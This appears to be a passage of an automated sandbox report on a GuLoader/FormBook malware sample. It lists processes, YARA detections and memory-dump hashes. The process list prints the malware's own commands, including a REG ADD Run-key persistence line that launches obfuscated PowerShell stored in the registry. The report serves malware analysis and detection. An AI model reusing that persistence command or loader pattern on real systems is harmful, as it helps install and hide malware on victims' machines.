                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2264331701.0000000008220000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2253915133.0000000005671000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2265640290.000000000DB8A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    Target ID:6
                    Start time:11:37:08
                    Start date:15/07/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
                    Imagebase:0x240000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:10
                    Start time:11:37:32
                    Start date:15/07/2024
                    Path:C:\Program Files (x86)\Windows Mail\wab.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                    Imagebase:0xa00000
                    File size:516'608 bytes
                    MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    Target ID:11
                    Start time:11:37:44
                    Start date:15/07/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
                    Imagebase:0x240000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:12
                    Start time:11:37:44
                    Start date:15/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:13
                    Start time:11:37:44
                    Start date:15/07/2024
                    Path:C:\Windows\SysWOW64\reg.exe
                    Wow64 process (32bit):true
                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
                    Imagebase:0x980000
                    File size:59'392 bytes
                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-788909730
                      • Opcode ID: 17ecffa2d2aff9de952f8cd613e9214a1dd3c26078b63ad2fdef2554defb9026
                      • Instruction ID: c5f66b9b4b3dd5a91a7f05c74c3f0b41577a3f0c836c1892ae9fa6c70bad2d02
                      • Opcode Fuzzy Hash: 17ecffa2d2aff9de952f8cd613e9214a1dd3c26078b63ad2fdef2554defb9026
                      • Instruction Fuzzy Hash: ABD138B1B00209DFCB1E9F68C84476ABBE2FF85710F14C46AE9259B391DB31D945CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                      • API String ID: 0-2822668367
                      • Opcode ID: 9314383069412525fb4fdf51eaafb7a9f746ff9bf03d275551ff72ada851488b
                      • Instruction ID: 1bced42a63f9fdcc94249d7029365dbfa93f3ce1711b4bbcc5706eb8a2e74f41
                      • Opcode Fuzzy Hash: 9314383069412525fb4fdf51eaafb7a9f746ff9bf03d275551ff72ada851488b
                      • Instruction Fuzzy Hash: 4262ADB4E00219CFDB28DB58C955B6EBBB2BF85704F1085A9D8156B395CB32EC81CF91
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-3669853574
                      • Opcode ID: 7c903c11f1c27695805ba374b266628dcbd2b7b881a18c49e098e59cedd8a9e9
                      • Instruction ID: 556846431b784bbb8d455612584e958d90088d7cdaa0963144096db7fc6264bd
                      • Opcode Fuzzy Hash: 7c903c11f1c27695805ba374b266628dcbd2b7b881a18c49e098e59cedd8a9e9
                      • Instruction Fuzzy Hash: 31B16EB1B0421ADFC72E8FB9C54076ABBA6EF85310F24846BDC159B2D1DB31D841C791
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                      • API String ID: 0-2822668367
                      • Opcode ID: 17cddf1a8676631f364a1e4dc5b786293c2802be24559066b257bd5817521339
                      • Instruction ID: 7237b3e17efefeb9dd9000c8c089b7fc3e0dc9e40606141203bd6f25424a3080
                      • Opcode Fuzzy Hash: 17cddf1a8676631f364a1e4dc5b786293c2802be24559066b257bd5817521339
                      • Instruction Fuzzy Hash: C6D18B74A00209CFCB18DB68C956B9EBBB2AF84314F11C469D8116F395CB76EC86CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$tP^q$tP^q
                      • API String ID: 0-3859475322
                      • Opcode ID: d37ab7e723f170c9f98721fc5c1dd3cb38cd83ad90f39a272af57a789db67c21
                      • Instruction ID: 989e696ddbb89b7ac619b625b615834fad124714d967afeb1b368a9fa6266ff1
                      • Opcode Fuzzy Hash: d37ab7e723f170c9f98721fc5c1dd3cb38cd83ad90f39a272af57a789db67c21
                      • Instruction Fuzzy Hash: DD829DB4B10205CFDB29CB98C945A6ABBF3AF85304F55C069E815AF395CB32EC45CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q$4'^q
                      • API String ID: 0-1420252700
                      • Opcode ID: d897e78dd201279169f7a49b844cd2c73bfc50a8469614dede72976c1dc0ac43
                      • Instruction ID: d8e521d135dbbad35e48ccfd3427759afb57fafa9c85a4738be30de2cb215184
                      • Opcode Fuzzy Hash: d897e78dd201279169f7a49b844cd2c73bfc50a8469614dede72976c1dc0ac43
                      • Instruction Fuzzy Hash: D21237B1744215CFCB2A9B688815B6A7FA29FC1310F14C56AD955EF3D1DF32C841CBA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$$^q
                      • API String ID: 0-953868773
                      • Opcode ID: 193800e2c638b97bd8cdc3e02721eeb12950cccaa0ef631fd190e2e0fad7a645
                      • Instruction ID: 38d83ac58eb6ccde0ef625844d945884a26a33b4a4b42633c3018083c6419e58
                      • Opcode Fuzzy Hash: 193800e2c638b97bd8cdc3e02721eeb12950cccaa0ef631fd190e2e0fad7a645
                      • Instruction Fuzzy Hash: EF9138B0704306CFCB1D9B39881566A7BE2AFC2204F1484AAD955DF3D2DB36D845CB62
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q$4'^q
                      • API String ID: 0-1196845430
                      • Opcode ID: 8e70660af499d56cd2f8283f5666716c5a930bf355cc5387263c305952e6b9cd
                      • Instruction ID: 71c8d1ebf0408c5405722bf6d1d2db0fa2455362f9378d2f636196dfce5df3ca
                      • Opcode Fuzzy Hash: 8e70660af499d56cd2f8283f5666716c5a930bf355cc5387263c305952e6b9cd
                      • Instruction Fuzzy Hash: 2CB19BB4A00205CFCB19DB68C946B9EBBB2AF88314F15C459D8252F3D5CB75EC85CBA1
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q$4'^q
                      • API String ID: 0-2697143702
                      • Opcode ID: f9cc341964f26b1b9c22c2353dff98d9f181defe67cebeb5c0dc9cf2d6403ae9
                      • Instruction ID: e96ed903bdd58bc940acd4487d7636dcb6524c88eb1cd2c6f3a6309b6bdf9bb0
                      • Opcode Fuzzy Hash: f9cc341964f26b1b9c22c2353dff98d9f181defe67cebeb5c0dc9cf2d6403ae9
                      • Instruction Fuzzy Hash: 70F19E74B40214CFDB28EB68CD55B5ABBB2AB84304F1084A9D9096F3A5CB71ED85CF91
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $^q$$^q
                      • API String ID: 0-355816377
                      • Opcode ID: e1648ccfebd76e4d2cb3b59fcb25e1ffcf6740f5bffb678740e9549f97ebc306
                      • Instruction ID: 86af589a4ed67ee1c85656d1b8cc4933b8b6fb6489ec976f4eb3f9efab624819
                      • Opcode Fuzzy Hash: e1648ccfebd76e4d2cb3b59fcb25e1ffcf6740f5bffb678740e9549f97ebc306
                      • Instruction Fuzzy Hash: 3C117FB5609346DFD72A8AB48840966BF75EF8A310B19809BD8548F1D2D735E805C751
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: $^q
                      • API String ID: 0-388095546
                      • Opcode ID: 1a8aa7295e3287cd064c3d8a74accd5c29be2b32aec5189d9134ca802bb570b7
                      • Instruction ID: aeff496a578acaaf73c6c1e99198083a10ac3da1a5428a29a0128e34b0164322
                      • Opcode Fuzzy Hash: 1a8aa7295e3287cd064c3d8a74accd5c29be2b32aec5189d9134ca802bb570b7
                      • Instruction Fuzzy Hash: 30814AB1B0434AEFC72B4B79984076ABBA5AFC2210F2484ABDC64CB291CB31DC45D761
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: tP^q
                      • API String ID: 0-2862610199
                      • Opcode ID: bb20f4631692305346b1131fa1c0cb9d92efe650b6d8e8c0fbc57af953d5a875
                      • Instruction ID: 0304a05e16df32c178976f7fb2179a3668186d90b0f1acc7306eb53b6efc308a
                      • Opcode Fuzzy Hash: bb20f4631692305346b1131fa1c0cb9d92efe650b6d8e8c0fbc57af953d5a875
                      • Instruction Fuzzy Hash: F06125F4A09281DFC71A8B64C854A16BFB1AF86218F19C5DED8648F2D3C731DD46C762
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'^q
                      • API String ID: 0-1614139903
                      • Opcode ID: 47427dc860191eeaaf8d4d3f497b972aadb360298ec66dda538fdab46debc803
                      • Instruction ID: 07eb59e0fa86dda89ddb0417278e377f6bdce4ef9d345c220f971718894f8c96
                      • Opcode Fuzzy Hash: 47427dc860191eeaaf8d4d3f497b972aadb360298ec66dda538fdab46debc803
                      • Instruction Fuzzy Hash: 914127B0B04302CFCB1E8F298995B3A7BE2AF81344F1584A5DD619F2D2D735D845CB62
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d9f5de416c5cefb1a247a370c7045023b67980299511ec31f9530c56bfcd89d9
                      • Instruction ID: d69acd3b4556e6476957f664b91b193d0cddc29afb2c64c54793db52394725c2
                      • Opcode Fuzzy Hash: d9f5de416c5cefb1a247a370c7045023b67980299511ec31f9530c56bfcd89d9
                      • Instruction Fuzzy Hash: 9F3217B4B10205CFD728CB98C945E59BBB3BB85314F55C099D829AF396CB72EC46CB81
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 06adab489b76004f1c1d192978a9e255d85d2a849d59b0afa12d57b39f995d9e
                      • Instruction ID: f4fd13720d3a745b3f83258ec132cef64d37c3eb03c7c7c78a3f037d21b0f774
                      • Opcode Fuzzy Hash: 06adab489b76004f1c1d192978a9e255d85d2a849d59b0afa12d57b39f995d9e
                      • Instruction Fuzzy Hash: 1B1249B4B10205CFD728CB98C945E59BBB3AF85304F55C059E825AF396CB72EC46CB81
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59dec5ce21942bb7d39980848b6f7adc902fabd1e38ea9756c92ad4c876e8a5d
                      • Instruction ID: 19b8c6abafbf4df6b6a39bedc2539cc5084fc65c1d9002c23b99ab9ec61004ea
                      • Opcode Fuzzy Hash: 59dec5ce21942bb7d39980848b6f7adc902fabd1e38ea9756c92ad4c876e8a5d
                      • Instruction Fuzzy Hash: CBC1AD75B10209DFCB14DFA4D544A9DBBB6FF84310F1585A9E806AB365CB38ED89CB80
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b7e10e36356fc4ff2ded33584a45be1d118c32e5f2568c65a69a236ca8e2ce0a
                      • Instruction ID: 83574bad559faeb85db9aa9d9747ba84a5b227be9f4e1215df4ac9edbec4c58f
                      • Opcode Fuzzy Hash: b7e10e36356fc4ff2ded33584a45be1d118c32e5f2568c65a69a236ca8e2ce0a
                      • Instruction Fuzzy Hash: CAB18EB0F1020ADFDF10DFA8DA8579DBBF1AF48314F158529D814E7264EB74A845CB91
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aa5eb27ad048bd99f55037ba483bc898e750c6884143e42ed0da5a86b790582c
                      • Instruction ID: 765226409666f39bdcfdd0b9317c0a00d953b0566fce7fbf09a503894861e7a2
                      • Opcode Fuzzy Hash: aa5eb27ad048bd99f55037ba483bc898e750c6884143e42ed0da5a86b790582c
                      • Instruction Fuzzy Hash: 99B19E70F2020ADFDB10CFA8DA9579DBBF2BF48314F158529D814E7264EB74A885CB81
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bf4a6e39e30ad4fc3f650183f7c51ec422b45f5f0210ef42c3eb975bbc58dd3d
                      • Instruction ID: e250798e37d75dba7a2c7c4371e38433a7eb7349ef43bf4b6139985ae4f91c16
                      • Opcode Fuzzy Hash: bf4a6e39e30ad4fc3f650183f7c51ec422b45f5f0210ef42c3eb975bbc58dd3d
                      • Instruction Fuzzy Hash: B0918EB0B50204DFDB18DB68C945B9EBBA3AF98304F21C069E9156F795CB72EC41CB91
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 709ae5fe3c0182c1aff1e2ed36e9a89ede3ab474f68b970434dae88a2bc32848
                      • Instruction ID: fdc263f26ec813069f4b15b00fdb30ff91856637c227aaa6c60b6c7fa8b82e8f
                      • Opcode Fuzzy Hash: 709ae5fe3c0182c1aff1e2ed36e9a89ede3ab474f68b970434dae88a2bc32848
                      • Instruction Fuzzy Hash: A9919BB0A40204DFDB19DB64C945B9EBBB3AF88314F218069E9156F3A1CB76EC41CB91
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c1e4067a0a1a091097ac1cd0af7a28dbc1174ed8f211af8dc6c203e0190fef6b
                      • Instruction ID: fe67a9b5df8e0ef1a6536d09dbcb66d3b7b79887e572bd25ce8dd27f89a3e9da
                      • Opcode Fuzzy Hash: c1e4067a0a1a091097ac1cd0af7a28dbc1174ed8f211af8dc6c203e0190fef6b
                      • Instruction Fuzzy Hash: 07718D30B162449FCB15EB74D444AAEBBF2AF89304F1884A9E805EB362D775EC85CB50
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c11404679a602d22bfc7804999b45106a0616d97321f3ff8d31072cc85465d9f
                      • Instruction ID: c7a0d40347c84d6502860c44563d22537167ab6b81904ab3777fd35b86e51267
                      • Opcode Fuzzy Hash: c11404679a602d22bfc7804999b45106a0616d97321f3ff8d31072cc85465d9f
                      • Instruction Fuzzy Hash: 0071AF70A00209CFCB14DF69D840A9EBBF6FF89314F14856AE419DB661DB75EC86CB90
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 194e467efa447850ad0e1340ba3461f095ac288d7fc5ca620e7c4c30a1eb584c
                      • Instruction ID: d2383492a9ea1e99cb5b1cff2df2f61e556b29242cf534857cd8cca93604622d
                      • Opcode Fuzzy Hash: 194e467efa447850ad0e1340ba3461f095ac288d7fc5ca620e7c4c30a1eb584c
                      • Instruction Fuzzy Hash: E9714970A10209DFDB14DFA9D544BADBBF6BF88304F148429D416AB2A0DB75AC86CB41
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 89ee1771a5ebc3b0e51d7c4e39582554e6e85b7f1e395e014a73589dbe331df1
                      • Instruction ID: 3b26a3bc23eb9197f64aa32fce301dd19bc4aae0fa35e89350b4465c651580fc
                      • Opcode Fuzzy Hash: 89ee1771a5ebc3b0e51d7c4e39582554e6e85b7f1e395e014a73589dbe331df1
                      • Instruction Fuzzy Hash: A8516FB0A10209DFDB14DFA9C9547ADBBF6FF88344F148429D406AB7A0DBB5AC85CB50
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9463335c90bebe56822feb6d6ea5335b6d2ae0037fcf9759d814bd4b54fb9914
                      • Instruction ID: 69efb0f4037771bbe4a88c4dd89f68c495e1c70e2ee7950cda0b844946c09ffe
                      • Opcode Fuzzy Hash: 9463335c90bebe56822feb6d6ea5335b6d2ae0037fcf9759d814bd4b54fb9914
                      • Instruction Fuzzy Hash: 525178B4A15286CFCB06CF58C4949AABBB1FF49310B15459AD8419B2A6C735FC50CFA0
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d1dc1d6c9aa6c1c4d8ba1f4da934c11bef35099fde55d04b51fa9f2599bf29c3
                      • Instruction ID: c7217acea706a85072a7c7f3f23d23a865367f13040345a2264f3bf2c3775bb4
                      • Opcode Fuzzy Hash: d1dc1d6c9aa6c1c4d8ba1f4da934c11bef35099fde55d04b51fa9f2599bf29c3
                      • Instruction Fuzzy Hash: A3415E71B00241CFDB15DB65C558AADBBF6EF89750F084469E806EB7A0DB39EC81CB50
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b2bdea14f89c37c8d8da561730a52e3ca88e00d5692ec273e8f18f67513b9a61
                      • Instruction ID: 37c96ad960ee715851d640c20f6a4b808f09c0c3d7e5551caccf3666da9a9fde
                      • Opcode Fuzzy Hash: b2bdea14f89c37c8d8da561730a52e3ca88e00d5692ec273e8f18f67513b9a61
                      • Instruction Fuzzy Hash: 53410BB0A50302CFCB2E8F288981A6A7FA2AF85344F15C1A6DD55AF3D1D735DC41CBA1
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e70f7b6c0f0e1182948b7dc18d6c9096ba6d37a4c5dfb8997dd05d04f69c51a8
                      • Instruction ID: fb74b34afc79e8d870558f1c3dd720df126185fa9bcb27e06cddf97d058ea0c6
                      • Opcode Fuzzy Hash: e70f7b6c0f0e1182948b7dc18d6c9096ba6d37a4c5dfb8997dd05d04f69c51a8
                      • Instruction Fuzzy Hash: 3941F2B4A11509DFCB09CF99C1949AABBB1FF48310B118699D815AB3A4C736FC90CFA0
                      Memory Dump Source
                      • Source File: 00000005.00000002.2258320191.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_7150000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3da3d879d7c926ff29776fb79916246de27309672ea15f4d6160aa278c990c11
                      • Instruction ID: d7012a5c9d05a5a672ca1171e95b4b8bfb9759118c08093dd477e3221edd22bf
                      • Opcode Fuzzy Hash: 3da3d879d7c926ff29776fb79916246de27309672ea15f4d6160aa278c990c11
                      • Instruction Fuzzy Hash: FF315074B402149FD708AB64C955FAE7AB3ABC4304F21C418E9116F395CF76DC468B91
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_4250000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 47b72af617098cc60e7b5215c8719603dce407445aadf9d310aebe614cdf7d5b
                      • Instruction ID: b9f8c402e6cdef0d8c3ab9989ba809f16d106c13453baa92cd0da9512b5c99c3
                      • Opcode Fuzzy Hash: 47b72af617098cc60e7b5215c8719603dce407445aadf9d310aebe614cdf7d5b
                      • Instruction Fuzzy Hash: FA312330B112188FCB269B7088547EEBBB1AF49749F0544E9D409A7362EF35DE45CF81
                      Memory Dump Source
                      • Source File: 00000005.00000002.2249816061.0000000004250000.00000040.00000800.00020000.00000000.sdmp, Offset: 04250000, based on PE: false
                      Joe Sandbox IDA Plugin

                      Execution Graph

                      Execution Coverage:1.2%
                      Dynamic/Decrypted Code Coverage:16.7%
                      Signature Coverage:100%
                      Total number of Nodes:6
                      Total number of Limit Nodes:1

                      Callgraph


                      Control-flow Graph

                      APIs
                      • Sleep.KERNELBASE(00000005), ref: 084AAD4E

                      Control-flow Graph

                      control_flow_graph 21 24a82df0-24a82dfc LdrInitializeThunk
                      APIs
                      • API ID: InitializeThunk

                      Control-flow Graph

                      control_flow_graph 20 24a82c70-24a82c7c LdrInitializeThunk
                      APIs
                      • API ID: InitializeThunk

                      Control-flow Graph

                      control_flow_graph 22 24a835c0-24a835cc LdrInitializeThunk
                      APIs
                      • API ID: InitializeThunk
                      Memory Dump Source
                      • Source File: 0000000A.00000003.2366014845.0000000008C30000.00000004.00000020.00020000.00000000.sdmp, Offset: 08C30000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_3_8c30000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 88aa77377ff5d8812ebefde2d9558e73e29ab3716a22f7c98e85eba79b5ba34a
                      • Instruction ID: c03744889025007189bc291b0fe17707af7abb88aabaa8bda0415259990f6763
                      • Opcode Fuzzy Hash: 88aa77377ff5d8812ebefde2d9558e73e29ab3716a22f7c98e85eba79b5ba34a
                      • Instruction Fuzzy Hash: 0A5105B28492D29FC3468F74D8925D2BFF0EE2332432D45DAD4C08A153F3259657DBA5
